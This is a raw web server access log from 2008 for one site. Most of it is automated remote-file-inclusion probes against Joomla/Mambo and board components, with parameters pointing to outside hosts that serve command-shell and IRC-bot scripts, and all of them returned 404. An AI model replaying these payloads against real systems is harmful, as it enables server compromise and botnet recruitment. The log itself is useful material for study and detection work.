209.160.72.103 - - [10/Feb/2008:04:27:33 -0800] "GET /convert/mvcw.php?step=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:27:33 -0800] "GET /logs/convert/mvcw.php?step=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.30.216.103 - - [10/Feb/2008:04:28:20 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.152 - - [10/Feb/2008:04:29:11 -0800] "GET /retreat1/webcam/?M=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:39 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:39 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:39 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:39 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:39 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:40 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:40 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:40 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:40 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:40 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:40 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:40 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:53 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:54 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:29:54 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:29:57 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:00 -0800] "GET /logs/access_080130.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:00 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:00 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET /logs/access_080130.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:01 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:02 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:02 -0800] "GET /logs/access_080130.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:02 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:02 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:03 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:04 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET /logs/access_080130.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:04 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:06 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:06 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:06 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:07 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:07 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:07 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:08 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:08 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:08 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:08 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:11 -0800] "GET /logs/access_080117.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:11 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:11 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:11 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:12 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:12 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:12 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:14 -0800] "GET /logs/access_080117.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:15 -0800] "GET /logs/access_080117.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:16 -0800] "GET /logs/access_080117.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:29 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:29 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:29 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:30 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:30 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:30 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:30:30 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:30:30 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:30 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:30 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:31 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:30:31 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:31 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:32 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:32 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:30:36 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:04:30:36 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:38 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:38 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:30:39 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.45 - - [10/Feb/2008:04:30:48 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:31:00 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:31:02 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:31:03 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:12 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:13 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:13 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:23 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:23 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:24 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:24 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:39 -0800] "GET /logs/access_080117.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:31:41 -0800] "GET /logs/access_080120.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:31:44 -0800] "GET /logs/access_080120.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:31:48 -0800] "GET /logs/access_080120.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
